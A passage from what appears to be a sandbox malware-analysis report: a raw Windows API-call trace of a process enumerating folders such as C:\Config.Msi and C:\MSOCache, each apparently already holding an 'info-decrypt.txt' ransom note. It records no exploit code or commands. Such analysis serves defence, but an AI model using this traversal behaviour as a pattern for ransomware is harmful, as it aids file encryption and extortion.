(lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.270] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0131.272] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.273] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0131.274] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x692f72c) returned 1 [0131.274] GetFullPathNameW (in: lpFileName="C:\\Config.Msi", nBufferLength=0x105, lpBuffer=0x692f234, lpFilePart=0x0 | out: lpBuffer="C:\\Config.Msi", lpFilePart=0x0) returned 0xd [0131.274] GetFullPathNameW (in: lpFileName="C:\\Config.Msi\\", nBufferLength=0x105, lpBuffer=0x692f208, lpFilePart=0x0 | out: lpBuffer="C:\\Config.Msi\\", lpFilePart=0x0) returned 0xe [0131.274] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x692f454 | out: lpFindFileData=0x692f454*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0131.274] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x692f464 | out: lpFindFileData=0x692f464*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.274] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x692f464 | out: lpFindFileData=0x692f464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfccfd8e0, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 1 [0131.274] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x692f464 | out: lpFindFileData=0x692f464*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0131.275] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0131.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x692f6ec) returned 1 [0131.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x692f6f8) returned 1 [0131.275] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x692f72c) returned 1 [0131.275] GetFullPathNameW (in: lpFileName="C:\\Config.Msi", nBufferLength=0x105, lpBuffer=0x692f234, lpFilePart=0x0 | out: lpBuffer="C:\\Config.Msi", lpFilePart=0x0) returned 0xd [0131.275] GetFullPathNameW (in: lpFileName="C:\\Config.Msi\\", nBufferLength=0x105, lpBuffer=0x692f208, lpFilePart=0x0 | out: lpBuffer="C:\\Config.Msi\\", lpFilePart=0x0) returned 0xe [0131.275] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x692f454 | out: lpFindFileData=0x692f454*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0131.275] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x692f464 | out: lpFindFileData=0x692f464*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.275] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x692f464 | out: lpFindFileData=0x692f464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfccfd8e0, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 1 [0131.275] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x692f464 | out: lpFindFileData=0x692f464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfccfd8e0, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 0 [0131.276] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0131.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x692f6ec) returned 1 [0131.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x692f6f8) returned 1 [0131.315] CoUninitialize () [0131.316] SysReAllocStringLen (in: pbstr=0x692fdb0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x692fdb0*="KERNEL32.DLL") returned 1 [0131.316] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.316] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.319] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 113 os_tid = 0xb70 [0131.320] SysReAllocStringLen (in: pbstr=0x6c0fad4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6c0fad4*="KERNEL32.DLL") returned 1 [0131.320] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.320] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.322] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.323] SysReAllocStringLen (in: pbstr=0x6c0fad4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6c0fad4*="KERNEL32.DLL") returned 1 [0131.323] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.323] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.326] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.326] SysReAllocStringLen (in: pbstr=0x6c0fab0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6c0fab0*="KERNEL32.DLL") returned 1 [0131.326] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.327] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.329] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0131.331] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.332] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0131.332] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f67c) returned 1 [0131.332] GetFullPathNameW (in: lpFileName="C:\\MSOCache", nBufferLength=0x105, lpBuffer=0x6c0f184, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache", lpFilePart=0x0) returned 0xb [0131.332] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\", nBufferLength=0x105, lpBuffer=0x6c0f158, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\", lpFilePart=0x0) returned 0xc [0131.333] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*", lpFindFileData=0x6c0f3a4 | out: lpFindFileData=0x6c0f3a4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0131.333] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f3b4 | out: lpFindFileData=0x6c0f3b4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.333] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f3b4 | out: lpFindFileData=0x6c0f3b4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0131.333] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f3b4 | out: lpFindFileData=0x6c0f3b4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfccfd8e0, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 1 [0131.333] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f3b4 | out: lpFindFileData=0x6c0f3b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0131.333] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0131.334] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f63c) returned 1 [0131.334] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f648) returned 1 [0131.334] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f67c) returned 1 [0131.334] GetFullPathNameW (in: lpFileName="C:\\MSOCache", nBufferLength=0x105, lpBuffer=0x6c0f184, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache", lpFilePart=0x0) returned 0xb [0131.334] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\", nBufferLength=0x105, lpBuffer=0x6c0f158, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\", lpFilePart=0x0) returned 0xc [0131.334] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*", lpFindFileData=0x6c0f3a4 | out: lpFindFileData=0x6c0f3a4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0131.334] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f3b4 | out: lpFindFileData=0x6c0f3b4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.334] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f3b4 | out: lpFindFileData=0x6c0f3b4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0131.334] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f3b4 | out: lpFindFileData=0x6c0f3b4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfccfd8e0, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 1 [0131.335] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f3b4 | out: lpFindFileData=0x6c0f3b4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfccfd8e0, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 0 [0131.335] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0131.335] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f63c) returned 1 [0131.335] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f648) returned 1 [0131.335] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f62c) returned 1 [0131.335] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users", nBufferLength=0x105, lpBuffer=0x6c0f134, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users", lpFilePart=0x0) returned 0x15 [0131.335] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\", nBufferLength=0x105, lpBuffer=0x6c0f108, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\", lpFilePart=0x0) returned 0x16 [0131.335] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\*", lpFindFileData=0x6c0f354 | out: lpFindFileData=0x6c0f354*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0131.335] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.336] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0016-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~3")) returned 1 [0131.336] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0018-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~2")) returned 1 [0131.336] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0019-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9877A~1")) returned 1 [0131.336] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-001A-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9765F~1")) returned 1 [0131.336] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-001B-0409-1000-0000000FF1CE}-C", cAlternateFileName="{94E50~1")) returned 1 [0131.337] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-002C-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92787~1")) returned 1 [0131.337] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0043-0409-1000-0000000FF1CE}-C", cAlternateFileName="{95310~1")) returned 1 [0131.337] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0044-0409-1000-0000000FF1CE}-C", cAlternateFileName="{91454~1")) returned 1 [0131.337] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0054-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9EA85~1")) returned 1 [0131.337] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00A1-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92572~1")) returned 1 [0131.337] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00B4-0409-1000-0000000FF1CE}-C", cAlternateFileName="{912E0~1")) returned 1 [0131.338] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00BA-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~4")) returned 1 [0131.338] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0115-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~1")) returned 1 [0131.338] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0117-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9AFC7~1")) returned 1 [0131.344] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0011-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~1")) returned 1 [0131.345] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6c0f364 | out: lpFindFileData=0x6c0f364*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, 